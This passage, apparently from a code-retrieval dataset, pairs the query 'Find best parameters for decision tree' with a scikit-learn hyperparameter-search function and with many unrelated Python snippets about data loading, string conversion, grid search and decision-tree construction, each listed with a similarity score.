convert_txt_to_data():\n pass", "def __str__(self):\n return '\\tNo readable data representation.'", "def load(self):\n return", "def load(self, input):", "def __str__(self) -> str:\n return str(self.getvalue())", "def __str__(self) -> str:\n return str(self.getvalue())", "def __str__(self) -> str:\n return str(self.getvalue())", "def __load_class_representation(self, filename):\n\n # Reads in the reverse dictionary from the given file.\n with open(filename) as file:\n return json.load(file)", "def __str__(self):\n return bytes_to_string(self._bytes)", "def GetDataAsObject(self):", "def load(self):\n raise NotImplementedError()", "def load(self):\n raise NotImplementedError()", "def to_string(self, smirnoff_data):\n pass", "def build_from_string(self, obj):\n if self.string_type is unicode and not isinstance(obj, unicode):\n obj = str(obj).decode('utf-8')\n if self.string_type is str and not isinstance(obj, str):\n obj = unicode(obj).encode('utf-8')\n return self.art_type(obj.splitlines())", "def __repr__(self):\n return '%s.from_text(%r)' % (self.__class__.__name__, self.to_text())", "def load_and_print_info(data_module_class: type) -> None:\n\n parser = argparse.ArgumentParser()\n data_module_class.add_to_argparse(parser)\n args = parser.parse_args()\n dataset = data_module_class(args)\n dataset.setup()\n print(dataset)", "def convert_to_class(sim, dat_out):\n return dat_out", "def toString(data):\n\tif isString(data):\n\t\treturn data\n\telse:\n\t\treturn data.decode(\"latin-1\")", "def test_return_type(self):\n self.assertEqual(type(self.obj.to_json_string(self.valid_ld)), str)", "def load(self, input):\n pass", "def load(cls,data, recovery_mode = False):\n opid = _read_delimited_field(data)\n operation_type = _read_delimited_field(data)\n modlogger.debug( \"loading: %s,%s\"%(opid,operation_type))\n return _operation_type_map[operation_type].load(opid,data, recovery_mode = recovery_mode)", "def load(cls, filename):\n with open(filename, \"r\") as fp:\n ret = load(fp)\n if not isinstance(ret, cls):\n raise TypeError(\"invalid serialized type: expected '%s' \"\n \"got '%s'\" % (cls, type(ret)))\n return ret", "def data_type_str(self):\n return data_ref_type_str(self.data_type)", "def __str__(self):\n value = \"<Task: Unknown format.>\"\n try:\n value = json.dumps(self.__data)\n except ValueError:\n pass\n return value", "def saveClassroomData():\n with open(\"ClassRoomData.txt\",\"wb\") as classroomData:\n pickle.dump(classroomEntities,classroomData)", "def load(filename):\n print(uc.load(filename))", "def load_data(ctx, klass=None):\n if klass:\n if klass and not klass.startswith(\"public_data.models\"):\n klass = f\"public_data.models.{klass}\"\n options = {\"class\": klass}\n connecter = ScalingoInterface(ctx.obj)\n connecter.manage_py(\"load_data\", **options)", "def __repr__(self) :\n\n return str(self.data)", "def test_strmethod(self):\n b1 = BaseModel()\n self.assertEqual(type(str(b1)), str)", "def serialize(self, data):\n return data", "def load(input_path):\n\n dill._dill._reverse_typemap['ClassType'] = type\n with open(input_path, \"rb\") as file:\n return dill.load(file)", "def data_types(self):" ]
[ "0.64354247", "0.6280863", "0.6222278", "0.6192303", "0.61756396", "0.61756396", "0.61756396", "0.61756396", "0.61756396", "0.616021", "0.616021", "0.61370295", "0.61201906", "0.6067332", "0.6043132", "0.60146064", "0.60138565", "0.60008734", "0.5951044", "0.58738834", "0.5801465", "0.5661682", "0.56616336", "0.56599665", "0.56414795", "0.5629093", "0.5618559", "0.5618559", "0.5618559", "0.5618559", "0.5613107", "0.55840445", "0.55754334", "0.5568804", "0.55574596", "0.5535466", "0.5529598", "0.55190283", "0.55148715", "0.5497996", "0.54961574", "0.54907995", "0.5488022", "0.5471705", "0.5471705", "0.5446906", "0.54364395", "0.5429029", "0.54274184", "0.54259026", "0.5422482", "0.5422482", "0.54212636", "0.5414343", "0.54040307", "0.5402181", "0.53826785", "0.53806", "0.5371038", "0.53689915", "0.5368679", "0.5358244", "0.53473085", "0.5324215", "0.5305768", "0.53040767", "0.53040725", "0.5303472", "0.5300149", "0.52986646", "0.52860886", "0.52791935", "0.52787167", "0.52783746", "0.52783746", "0.52783746", "0.5264983", "0.5264674", "0.5263552", "0.526308", "0.526308", "0.5250329", "0.52485645", "0.52484626", "0.5237584", "0.523347", "0.523002", "0.52239287", "0.52168983", "0.52164996", "0.52156085", "0.5215348", "0.52070564", "0.5197517", "0.51974624", "0.5195433", "0.5193724", "0.5187396", "0.51863617", "0.5176907", "0.51747257" ]
0.0
-1
Find best parameters for decision tree
def find_best_classifier(x_train, x_test, y_train, y_test): max_depth, _ = find_best_parameters( 'max_depth', list(range(1, 30)), x_train, x_test, y_train, y_test) print("Best max_depth t: ", max_depth) min_samples_split, _ = find_best_parameters( 'min_samples_split', list(range(2, 400)), x_train, x_test, y_train, y_test) min_samples_split = int(min_samples_split) print("Best min samples split: ", min_samples_split) min_samples_leaf, _ = find_best_parameters( 'min_samples_leaf', list(range(2, 200)), x_train, x_test, y_train, y_test) min_samples_leaf = int(min_samples_leaf) print("Best sample leaf: ", min_samples_leaf) max_leaf_nodes, _ = find_best_parameters( 'max_leaf_nodes', list(range(2, 150)), x_train, x_test, y_train, y_test) max_leaf_nodes = int(max_leaf_nodes) print("Best max leaf nodes split: ", max_leaf_nodes) min_impurity_decrease, _ = find_best_parameters( 'min_impurity_decrease', np.arange(0.0005, 0.1, 0.0005), x_train, x_test, y_train, y_test) print("Best min impurity decrease: ", min_impurity_decrease) clf = DecisionTreeClassifier( min_impurity_decrease=min_impurity_decrease, max_depth=max_depth, min_samples_leaf=min_samples_leaf, max_leaf_nodes=max_leaf_nodes, min_samples_split=min_samples_split, random_state=0) clf = clf.fit(x_train, y_train) return clf
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def select_model():\r\n from sklearn import tree\r\n import graphviz\r\n\r\n ValidationSetAndLabels = AllSets[1]\r\n ValLabels = ValidationSetAndLabels[:, [-1]] # extract labels (last column)\r\n ValSet = np.delete(ValidationSetAndLabels, -1, axis=1) # delete labels\r\n\r\n TrainingSetAndLabels = AllSets[2]\r\n TrainLabels = TrainingSetAndLabels[:, [-1]] # extract labels (last column)\r\n TrainSet = np.delete(TrainingSetAndLabels, -1, axis=1) # delete labels\r\n\r\n \"\"\"\r\n This is the code to select the best hyperparameter (part b)\r\n\r\n for SplitCriterion in ['entropy', 'gini']:\r\n print \"Criterion: \" + SplitCriterion + '\\n'\r\n\r\n for MaxDepth in [int(depth) for depth in np.linspace(1, np.log2(TrainSet.shape[1]), 5)]:\r\n print \"max_depth: \" + str(MaxDepth) + '\\n'\r\n\r\n MyTree = tree.DecisionTreeClassifier(criterion=SplitCriterion, max_depth=MaxDepth)\r\n MyTree = MyTree.fit(TrainSet, TrainLabels)\r\n\r\n Predictions = MyTree.predict(ValSet)\r\n Result = np.abs(Predictions - ValLabels.flatten())\r\n\r\n Accuracy = 100 * float(np.count_nonzero(Result == 0)) / Predictions.shape[0]\r\n\r\n print \"Accuracy for this test is: %f %%\" %Accuracy\r\n print '\\n'\r\n\r\n print '\\n'\r\n \"\"\"\r\n\r\n MyTree = tree.DecisionTreeClassifier(criterion='entropy', max_depth=12)\r\n\r\n MyTree = MyTree.fit(TrainSet, TrainLabels)\r\n\r\n Predictions = MyTree.predict(ValSet)\r\n Result = np.abs(Predictions - ValLabels.flatten())\r\n\r\n Accuracy = 100 * float(np.count_nonzero(Result == 0)) / Predictions.shape[0]\r\n\r\n dot_data = tree.export_graphviz(MyTree, out_file=None, max_depth=2,\r\n feature_names=AllSets[3], filled=True, rounded=True, special_characters=True,\r\n class_names=TrainLabels.flatten().astype(str))\r\n graph = graphviz.Source(dot_data)\r\n graph.render(\"output\")", "def decision_tree(original_training_data,call_depth):\n\n ''' Checking the stopping criterion. If yes then it returns the majority class (Muffin or CupCake) '''\n if check_if_stopping_criterion_is_met(original_training_data.values) or call_depth > 10:\n majority = classification(original_training_data)\n return majority\n\n else:\n ''' Each time we split the data and go deeper, we increment the depth of the tree '''\n call_depth += 1\n\n ''' Finding the best attribute, best threshold to split data, best minimum entropy '''\n best_split_index, best_attribute, best_threshold, best_minimum_entropy = find_best_attribute_threshold_entropy(original_training_data)\n original_training_data_values = original_training_data.values\n\n best_split_values = original_training_data_values[:,best_split_index]\n\n less_than_threshold = original_training_data[best_split_values <= best_threshold]\n more_than_threshold = original_training_data[best_split_values > best_threshold]\n\n ''' Initializing a variable called as condition which stores the format of the key for the resulting decision tree dictionary '''\n condition = original_training_data.columns[best_split_index] + \" <= \" + str(best_threshold)\n\n ''' Initializing a dictionary where key is condition and value is a list. This is the basic data structure in which the\n resulting decision tree is stored '''\n sub_tree = {condition: []}\n\n ''' Calling the decision tree recursively '''\n left_tree = decision_tree(less_than_threshold, call_depth)\n right_tree = decision_tree(more_than_threshold, call_depth)\n\n ''' For removing edge cases where on either split, the resulting decision tree gives the same result '''\n if left_tree == right_tree:\n sub_tree = left_tree\n else:\n ''' Appending the smaller trees in the final decision tree '''\n sub_tree[condition].append(left_tree)\n sub_tree[condition].append(right_tree)\n\n return sub_tree", "def findBestScore():\n resultList = []\n BestScore = 0\n # iterate through different max_depths from 1 to 19\n for max_depth in range(1,20):\n dtree = tree.DecisionTreeClassifier(max_depth=max_depth)\n trainng_score = []\n testing_score = []\n # run 10 different cross-validation\n for index in range(10):\n # split into cross-validation sets.\n cv_data_train, cv_data_test, cv_target_train, cv_target_test = \\\n cross_validation.train_test_split(X_train, y_train, test_size=0.1)\n # fit the model using the cross-validation data\n # and tune parameter, such as max_depth here\n dtree = dtree.fit(cv_data_train, cv_target_train)\n dtree.feature_importances_\n trainng_score += [dtree.score(cv_data_train,cv_target_train)]\n testing_score += [dtree.score(cv_data_test,cv_target_test)]\n\n # Compute the average score for both traning and testing data\n trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)\n testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)\n\n # find the best score\n if testing_avgScore > BestScore:\n BestScore = testing_avgScore\n best_depth = max_depth\n resultList += [[best_depth, trainng_avgScore, testing_avgScore]]\n print ('The best average score and the corresponding max_depth is: ')\n return BestScore, best_depth", "def find_best_params(features, target, n_folds=5):\n # prepare hyperparameter set\n params = {'n_neighbors': np.arange(1, 25)}\n # init the search algorithm\n clf = GridSearchCV(KNeighborsClassifier(), params,cv=n_folds)\n # fit the dataset\n clf.fit(features, target)\n # return best hyperparameters\n return clf.best_params_", "def param_selection(X, Y, nfolds, param_grid, classifier):\n grid_search = GridSearchCV(classifier, param_grid, cv = nfolds)\n grid_search.fit(X, Y)\n grid_search.best_params_\n return grid_search.best_params_", "def tree(self):\n\n tree_parameters = [{'min_samples_leaf': list(range(2, 10, 1)),\n 'criterion': ['mae', 'mse'],\n 'random_state': [1]}]\n tree_grid = GridSearchCV(estimator=DecisionTreeRegressor(),\n param_grid=tree_parameters,\n scoring=self.scorer, cv=5, n_jobs=-1,\n iid=False)\n tree_grid_result = tree_grid.fit(self.X_train, self.y_train)\n best_tree_parameters = tree_grid_result.best_params_\n tree_score = tree_grid_result.best_score_\n print('Best tree params: ' + str(best_tree_parameters))\n print('Tree score: ' + str(tree_score))\n return DecisionTreeRegressor(\n min_samples_leaf=best_tree_parameters['min_samples_leaf'],\n criterion=best_tree_parameters['criterion'],\n random_state=1)", "def optimization_parameters():\n param_distributions = {\n \"n_estimators\": list(range(50, 300, 50)),\n \"max_features\": [\"auto\", \"log2\"],\n \"max_depth\": list(range(1, 21, 2)),\n \"min_samples_leaf\": list(range(4, 22, 2)),\n \"min_samples_split\": list(range(5, 30, 5)),\n \"criterion\": [\"gini\", \"entropy\"],\n }\n param_grid = {\n \"n_estimators\": list(range(50, 300, 50)),\n \"max_depth\": list(range(1, 21, 2)),\n \"min_samples_leaf\": list(range(4, 22, 2)),\n \"min_samples_split\": list(range(5, 30, 5)),\n \"criterion\": [\"gini\", \"entropy\"],\n }\n\n rfc = RandomForestClassifier()\n\n # 5 * 10 * 9 * 5 * 2 = 4500 iterations\n # will take a lot of time\n model = GridSearchCV(\n estimator=rfc,\n param_grid=param_grid,\n scoring=\"accuracy\",\n verbose=10,\n n_jobs=1,\n cv=5,\n )\n # initiates Randomized Search \n model = RandomizedSearchCV(\n estimator=rfc,\n param_distributions=param_distributions,\n n_iter=20,\n scoring='accuracy',\n verbose=10,\n n_jobs=1,\n cv=5,\n )\n \n # fit and predict the model\n model.fit(x_train, y_train)\n pred = model.predict(x_test)\n \n # define evaluation metric as accuracy score\n acc = accuracy_score(y_test, pred) * 100\n print(f\"RandomForestClassifier with GridSearchCV: {acc:0.2f}%\")\n print(\"Best parameters set:\")\n\n # extract best parameters \n best_parameters = model.best_estimator_.get_params()\n for param_name in sorted(param_grid.keys()):\n print(f\"\\t{param_name}: {best_parameters[param_name]}\")", "def fit_decision_tree(model, x_train, y_train):\r\n model.fit(x_train, y_train)\r\n score = model.score(x_train, y_train)\r\n importance = model.feature_importances_\r\n return score, importance", "def prior_params_tree(self):\n id = {name:i for i, name in enumerate(list(self.tree.keys()))}\n n_nodes = len(id)\n dist_mx = np.zeros((n_nodes, n_nodes))\n\n for node1, edges in self.tree.items():\n for node2, dist in edges.dist:\n dist_mx[id[node1], id[node2]] = dist\n dist_mx[id[node2], id[node1]] = dist\n\n # while np.count_nonzero(dist_mx) < (n_nodes ** 2 - n_nodes):\n for _ in range(20):\n for i, j in combinations(range(n_nodes), 2):\n if dist_mx[i,j] > 0:\n continue\n row_i = dist_mx[i]\n row_j = dist_mx[j]\n value = (row_i + row_j) * (row_i > 0) * (row_j > 0)\n dist_mx[i, j] = dist_mx[j, i] = - max(np.unique(value))\n dist_mx = np.abs(dist_mx)\n\n evolve_rate = []\n for node1, node2 in combinations(self.m_cov.keys(), 2):\n mx_cov_dist = np.abs(self.m_cov[node1] - self.m_cov[node2])\n elements = mx_cov_dist[np.triu_indices(len(mx_cov_dist))]\n norm_elements = elements / dist_mx[id[node2], id[node1]]\n evolve_rate += list(norm_elements)\n\n\n\n df = np.mean([p.shape[0] for _, p in self.m_profiles.items()])\n p_theta_alpha = df/2\n # p_theta_alpha = 4\n p_theta_beta = np.percentile(evolve_rate, 75) * (p_theta_alpha - 1)\n # print(p_theta_alpha, p_theta_beta)\n return p_theta_alpha, p_theta_beta", "def test_decision_tree_min_samples_split_parameter(params, X_train, X_test, y_train, y_test):", "def param_tune(self):\n grid = {'bootstrap': [True, False],\n 'max_depth': [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, None],\n 'max_features': ['auto', 'sqrt'],\n 'min_samples_leaf': [1, 2, 4],\n 'min_samples_split': [2, 5, 10],\n 'n_estimators': [200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000]}\n\n rf = RandomForestClassifier()\n rf_grid = GridSearchCV(estimator=rf, param_distributions=grid, verbose=2, n_jobs=-1)\n rf_grid.fit(self.X_train, self.y_train)\n self.results.write(str(rf_grid.best_params_) + \"\\n\")", "def tune_and_find_parameter(self,algo_name, algo, rating_data,param_grid):\n\n\n print(\"tuning for\", algo_name, \"hyperparameters\")\n\n # algo: algo class name\n grid_search = GridSearchCV(algo, param_grid, measures=['rmse', 'mae'])\n grid_search.fit(rating_data)\n\n print('best RMSE for ', algo_name, ' ', grid_search.best_score['rmse'])\n\n best_params = grid_search.best_params['rmse']\n # print the best set of parameters\n print(\"best params:\", best_params)\n return best_params", "def param_selection(df):\n n = df.count()\n numTrees = np.round(np.log10(n) * 100)\n maxDepth = np.round(np.log(n))\n minInstancesPerNode = np.round(np.log10(n) * (np.ceil(n / 500000) + 1))\n #maxBins = np.minimum(80, np.round(500 / np.log(n)))\n subsamplingRate = float(np.where(n > 500000, 0.6, 0.8))\n maxIter = np.round(np.log10(n) * 50)\n\n # minInstancesPerNode\n\n minInstancesPerNode = 200 if minInstancesPerNode > 200 else maxDepth\n minInstancesPerNode = 25 if minInstancesPerNode < 25 else minInstancesPerNode\n\n # maxDepth\n\n maxDepth = 15 if maxDepth > 15 else maxDepth\n maxDepth = 3 if maxDepth < 3 else maxDepth\n\n # maxIter applies to GBT\n\n maxIter = 200 if maxIter > 100 else maxIter\n maxIter = 50 if maxIter < 50 else maxIter\n\n # maxBins set to 32\n\n maxBins = 32\n\n print \"[Info] numTrees: \" + str(numTrees)\n print \"[Info] maxDepth: \" + str(maxDepth)\n print \"[Info] minInstancesPerNode: \" + str(minInstancesPerNode)\n print \"[Info] maxBins: \" + str(maxBins)\n print \"[Info] subsamplingRate: \" + str(subsamplingRate)\n print \"[Info] maxIter: \" + str(maxIter)\n\n return numTrees, maxDepth, minInstancesPerNode, maxBins, subsamplingRate, maxIter", "def guessTreeOpt(train, test, valid):\n best = findApproxDepth(train, valid, 5, 5)\n tree = DecisionTree(train)\n print(\"building tree from full set\")\n tree.buildTree(best[0], best[1], True)\n print(\"tree built, testing tree\")\n acc = testTreeF(tree, test)\n print(\"accuracy of:\", \"%.2f\" % (acc * 100))\n return tree", "def get_optimal_param(data_desc, ml_model_desc):\n if ml_model_desc == 'ANN': \n # return [<num_layers>, <momentum>, <learn rate>]\n if data_desc == 'young_students_ti_courses':\n return [100, 0.5, 0.001]\n elif data_desc == 'young_students_lic_courses':\n return [36, 0.9, 1.0]\n elif data_desc == 'young_students_comp_courses':\n return [36, 0.6, 0.001]\n elif data_desc == 'old_students':\n return [24, 0.5, 0.7]\n else:\n exit('can not get optimal parameters for the combination passed!')\n elif ml_model_desc == 'naive_bayes':\n if data_desc == 'young_students_ti_courses':\n return [GaussianNB()]\n elif data_desc == 'young_students_lic_courses':\n return [BernoulliNB()]\n elif data_desc == 'young_students_comp_courses':\n return [MultinomialNB()]\n elif data_desc == 'old_students':\n return [GaussianNB()]\n else:\n exit('can not get optimal parameters for the combination passed!')\n elif ml_model_desc == 'SVR': \n if data_desc == 'young_students_ti_courses':\n return ['linear', 1.0]\n elif data_desc == 'young_students_lic_courses':\n return ['linear', 1.0]\n elif data_desc == 'young_students_comp_courses':\n return ['rbf', 1.0]\n elif data_desc == 'old_students':\n return ['linear', 1.0]\n else:\n exit('can not get optimal parameters for the combination passed!')\n else: \n exit('can not get optimal parameters for the combination passed!')", "def random_param_tune(self):\n random_grid = {'bootstrap': [True, False],\n 'max_depth': [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, None],\n 'max_features': ['auto', 'sqrt'],\n 'min_samples_leaf': [1, 2, 4],\n 'min_samples_split': [2, 5, 10],\n 'n_estimators': [200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000]}\n\n rf = RandomForestClassifier()\n rf_random = RandomizedSearchCV(estimator=rf, param_distributions=random_grid, n_iter=250, cv=3, verbose=2, n_jobs=-1)\n rf_random.fit(self.X_train, self.y_train)\n self.results.write(str(rf_random.best_params_) + \"\\n\")", "def test_random_forest_max_depth_parameter(params, X_train, X_test, y_train, y_test):", "def optimize_parameters(model, grid, X_train, y_train):\n \n tss = TimeSeriesSplit(n_splits=10)\n \n \n print(\"[INFO] performing random search...\")\n searcher = RandomizedSearchCV(estimator=model, n_jobs=-1, n_iter=10, cv=tss,\n param_distributions=grid, scoring=('neg_mean_squared_error','neg_mean_absolute_error'), refit='neg_mean_squared_error')\n search_results = searcher.fit(X_train, y_train)\n best_params = search_results.best_params_\n print(\"Best parameters are: {}\".format(best_params))\n \n return best_params", "def tune_parameters(self, model, param_set, train, predictor_var, target_var):\n \n grid_search = GridSearchCV(estimator = model, param_grid = param_set,n_jobs=-1, cv=5)\n grid_search.fit(train[predictor_var],train[target_var])\n \n print(grid_search.best_params_, grid_search.best_score_)\n \n return grid_search.best_params_", "def getOptimalParams(self):\n\t\t# Load calibration chain and find optimal for like1\n\t\tcal_data = pd.read_csv(self.database_path, sep=',')\n\t\tparams = cal_data.ix[cal_data['like1'].idxmax()].to_dict()\n\t\tcost = params['like1']\n\t\t# reformat parameters to match original naming\n\t\tparams_reformatted = {}\n\t\tfor k, p in self.cal_params.items():\n\t\t\tparams_reformatted[k] = params['par'+k]\n\n\t\treturn params_reformatted, cost", "def findApproxDepth(train, valid, mD=0, mS=0):\n print(\n \"Building a random set of small trees to geuss the max depth and min set size values\"\n )\n res = []\n tree = DecisionTree(train.randSubSet(120, True))\n r = 10\n s = 3\n if mD != 0:\n s = mD - 1\n r = 1\n for i in range(\n s,\n r + s,\n ):\n depth = i + 1 # depth = randint(2,(len(train[0])-1)*3)\n a = 2\n b = 15\n if mS != 0:\n a = mS\n b = mS + 1\n for min_size in range(a, b, 2):\n # min_size = randint(2,(len(train[0])-1)*2)\n tree.buildTree(depth, min_size, True)\n acc = testTreeF(tree, valid)\n res.append([depth, min_size, acc])\n print(\"%.2f\" % (100 * (i - s + 1) / r), \"percent done\")\n best = max(res, key=lambda r: r[-1])\n # res.sort(key=lambda r: r[-1])\n # for r in res:\n # print(r)\n print(\"found a depth of\", best[0], \"and min size of\", best[1])\n return best", "def get_n_best(self):\n pass", "def test_random_forest_n_estimators_parameter(params, X_train, X_test, y_train, y_test):", "def dec_model(params):\n\n if (params['random']):\n print(\"Random Decision Tree Parameters.\")\n params['criterion'] = random.choice([\"gini\", \"entropy\"])\n params['splitter'] = random.choice([\"best\", \"random\"])\n params['max_features'] = random.choice(['auto', 'sqrt', 'log2', random.randrange(50, 1000, step=25), None])\n params['max_depth'] = random.choice([None, random.randrange(5, 1000, step=5)])\n params['min_samples_split'] = random.choice([2, random.randrange(1, 50, step=1)])\n params['max_leaf_nodes'] = random.choice([None, random.randrange(2, 50, step=1)])\n params['min_samples_leaf'] = random.choice([1, random.randrange(5, 100, step=5)])\n print(params)\n \n model = tree.DecisionTreeClassifier(\n criterion=params['criterion'],\n splitter=params['splitter'],\n max_features=params['max_features'],\n max_depth=params['max_depth'],\n min_samples_split=params['min_samples_split'],\n max_leaf_nodes=params['max_leaf_nodes'],\n min_samples_leaf=params['min_samples_leaf']\n )\n\n return model", "def parameter_optimize(self, estimator, parameters, X_test, y_test):\n cv = cross_validation.ShuffleSplit(self.X.shape[0], n_iter=100,\n test_size=0.3, random_state=42)\n clf = grid_search.GridSearchCV(estimator, parameters[1], cv = cv, n_jobs =4)\n t1 = time.time()\n clf.fit(self.X, self.y)\n print \"The optimize parameters for %s is: %s\"%(parameters[0], clf.best_params_)\n y_pred = clf.predict(X_test)\n t2 = time.time()\n print \"The running time for %s is: %f sec\"%(parameters[0], t2 - t1)\n score = metrics.accuracy_score(y_test, y_pred)\n print \"The accuracy score for %s is: %f\"%(parameters[0], score), \"\\n\"\n return {\"%s\"%parameters[0]: {\"estimator_parameters\": clf.best_params_, \n \"running_time\": t2-t1, \"accuracy_score\": score}}", "def best_params(self):\n return self.X[np.argmax(self.y.numpy())]", "def optimize(self, best_func):\n nb_clf = Pipeline(steps=[('vect', TfidfVectorizer()), ('clf', best_func)])\n parameters = {\n 'vect__stop_words': [None, 'english'],\n }\n gs_clf = GridSearchCV(nb_clf, parameters, scoring='accuracy')\n gs_clf = gs_clf.fit(self.train.text, self.train.gender)\n print(\"Best parameters: \" + str(gs_clf.best_params_))\n print('Best score: ' + str(gs_clf.best_score_))\n print('=' * 80)\n return gs_clf.best_params_", "def tree_optimize(mvp_tree,coefs=None):\n if not coefs:\n coefs = [1,1,1]\n # TODO", "def __build_tree__(self, features, classes, depth=0):\n\n # TODO: finish this.\n root = None\n if (len(set(classes)) <= 1) and (len(classes) != 0) :\n return DecisionNode(None,None,None,classes[0])\n elif (len(classes) == 0):\n return DecisionNode(None,None,None,2)\n elif depth == self.depth_limit:\n return DecisionNode(None,None,None,max(set(classes), key=list(classes).count))\n else:\n# if depth == 0:\n features = np.array(features)\n classes = np.array(classes).reshape(-1,1)\n feat_shape = features.shape\n sample_list = range(feat_shape[0])\n gains = np.zeros((feat_shape[1]))\n indices = np.zeros((feat_shape[1]))\n for i in range(feat_shape[1]):\n attribute = features[:,i]\n for j in range(20):\n split_indx = int(np.random.choice(sample_list, replace=False))\n idx_above = np.where(attribute > attribute[split_indx])[0]\n idx_below = np.where(attribute < attribute[split_indx])[0]\n classes_below = classes[idx_below,:].reshape(1,-1)[0]\n classes_above = classes[idx_above,:].reshape(1,-1)[0]\n gain = gini_gain(list(classes.reshape(1,-1)[0]),[list(classes_below),list(classes_above)])\n if gain > gains[i]:\n gains[i] = gain\n indices[i] = split_indx\n indx = np.argmax(gains)\n split_indx = int(indices[indx])\n attribute = features[:,indx]\n idx_above = np.where(attribute > attribute[split_indx])[0]\n idx_below = np.where(attribute < attribute[split_indx])[0] \n features_below = features[idx_below,:]\n features_above = features[idx_above,:]\n classes_below = classes[idx_below,:].reshape(1,-1)[0]\n classes_above = classes[idx_above,:].reshape(1,-1)[0]\n if (len(classes_below) != 0) and (len(classes_above) != 0):\n root = DecisionNode(None,None,lambda feat:feat[indx] > features[split_indx,indx])\n root.left = self.__build_tree__(features_above, classes_above, depth+1)\n root.right = self.__build_tree__(features_below, classes_below, depth+1)\n return root\n elif (len(classes_below) == 0) and (len(classes_above) != 0):\n return DecisionNode(None,None,None,max(set(classes_above), key=list(classes_above).count))\n elif (len(classes_above) == 0) and (len(classes_below) !=0):\n return DecisionNode(None,None,None,max(set(classes_below), key=list(classes_below).count))\n else:\n return DecisionNode(None,None,None,2)", "def greedy_learn_search(self,db,labels):\n queue = PriorityQueue()\n dolowmem = (self.lowmem == True)\n numidsets = 0\n root_ids = range(len(labels))\n queue.push((self.root,root_ids),len(labels))\n numnodes = 1\n deepest = 0\n err = 0\n while len(queue) > 0 and numnodes+2 <= self.maxnodes:\n #print \"%d nodes, priority %d\"%(numnodes,queue.nextkey())\n nerr = queue.nextkey()\n (node,trainingset) = queue.pop()\n #print \"Greedy learn\",len(trainingset)\n if trainingset is None:\n trainingset = self.identify_examples(db,labels,node)\n if node.depth >= self.maxdepth or len(trainingset) <= self.minexamples:\n #print \" Hit depth or training set limit\"\n node.pick_best_label(db,labels,trainingset)\n err += misclassification_error([labels[id] for id in trainingset])\n continue\n features = self.feature_subset(node,db,labels,trainingset)\n cost = node.pick_best_split(db,labels,trainingset,features)\n numidsets -= len(trainingset)\n #do a split\n if node.type == 'v':\n continue\n elif node.type == 's':\n #discrete split\n node.children = dict()\n #select sub-indices\n Eids = defaultdict(list)\n noneids = []\n for id in trainingset:\n v = db[node.feature,id]\n if v is None:\n #item doesn't exist, it's a missing value\n noneids.append(id)\n else:\n Eids[v].append(id)\n #determine whether to switch to low-memory mode\n if not dolowmem and self.lowmem=='auto':\n for v,vids in Eids.iteritems():\n numidsets += len(vids)+len(noneids)\n if numidsets > self.lowmem_threshold:\n print \"Decision tree learner switching to low-memory mode\"\n dolowmem = True\n trainingset = None\n\n\n numnodes += len(Eids)\n #print \"Split sizes\",[len(v) for v in Eids.itervalues()]\n #print \"None size\",len(noneids)\n for v,vids in Eids.iteritems():\n #print \"->\",len(vids),\"+\",len(noneids)\n #recurse\n c = DecisionTreeNode(node)\n node.children[v] = c\n err = misclassification_error([labels[id] for id in vids+noneids])\n cids = (None if dolowmem else vids+noneids)\n queue.push((c,cids),err)\n if c.depth > deepest:\n deepest = c.depth\n print \"Decision tree learner: Reached node with depth\",deepest\n else:\n #do an inequality split\n assert node.type == 'i',\"Got a weird type? \"+str(node.type)\n leftids = []\n rightids = []\n for id in trainingset:\n val = db[node.feature,id]\n if val is not None:\n if val <= node.value: leftids.append(id)\n else: rightids.append(id)\n else:\n leftids.append(id)\n rightids.append(id)\n if len(leftids)==0 or len(rightids)==0:\n print \"node feature \"+str(node.feature)+\" doesn't have a valid split value \"+str(node.value)\n vals = [db[node.feature,id] for id in trainingset if db[node.feature,id]!=None]\n print \"min,max of training set:\",min(vals),max(vals)\n print \"cost is\",cost\n raw_input()\n assert len(leftids) > 0 and len(rightids) > 0\n if not dolowmem and self.lowmem=='auto':\n numidsets += len(leftids) + len(rightids)\n if numidsets > self.lowmem_threshold:\n print \"Decision tree learner switching to low-memory mode\"\n dolowmem = True\n trainingset = None\n numnodes += 2\n c1 = DecisionTreeNode(node)\n c2 = DecisionTreeNode(node)\n node.children = {0:c1,1:c2}\n #print \"->\",len(leftids)\n #print \"->\",len(rightids)\n err1 = misclassification_error([labels[id] for id in leftids])\n err2 = misclassification_error([labels[id] for id in rightids])\n if dolowmem:\n leftids = None\n rightids = None\n queue.push((c1,leftids),err1)\n queue.push((c2,rightids),err2)\n if c1.depth > deepest:\n deepest = c1.depth\n print \"Decision tree learner: Reached node with depth\",deepest\n #end of recursion. for the rest of the nodes still in the queue, make them leaf nodes\n if len(queue) > 0:\n print \"%d nodes remaining in queue, setting to leaves\"%(len(queue),)\n for (node,trainingset) in queue:\n node.pick_best_label(db,labels,trainingset)\n err += misclassification_error([labels[id] for id in trainingset])\n return err", "def _get_best_ratios(self, context):\n _logger.info('_get_best_ratios')\n pruned_params = []\n for param in context.eval_graph.all_parameters():\n if re.match(self.pruned_params, param.name()):\n pruned_params.append(param.name())\n\n min_ratio = 0.\n max_ratio = 1.\n\n flops = context.eval_graph.flops()\n model_size = context.eval_graph.numel_params()\n\n while min_ratio < max_ratio:\n ratio = (max_ratio + min_ratio) / 2\n _logger.debug(\n '-----------Try pruning ratio: {:.2f}-----------'.format(ratio))\n ratios = [ratio] * len(pruned_params)\n param_shape_backup = {}\n self._prune_parameters(\n context.eval_graph,\n context.scope,\n pruned_params,\n ratios,\n context.place,\n only_graph=True,\n param_shape_backup=param_shape_backup)\n\n pruned_flops = 1 - (float(context.eval_graph.flops()) / flops)\n pruned_size = 1 - (float(context.eval_graph.numel_params()) /\n model_size)\n _logger.debug('Pruned flops: {:.2f}'.format(pruned_flops))\n _logger.debug('Pruned model size: {:.2f}'.format(pruned_size))\n for param in param_shape_backup.keys():\n context.eval_graph.var(param).set_shape(param_shape_backup[\n param])\n\n if abs(pruned_flops - self.target_ratio) < 1e-2:\n break\n if pruned_flops > self.target_ratio:\n max_ratio = ratio\n else:\n min_ratio = ratio\n _logger.info('Get ratios: {}'.format([round(r, 2) for r in ratios]))\n return pruned_params, ratios", "def optimize(\n # trials,\n random_state=SEED):\n\n space = {\n 'max_depth': 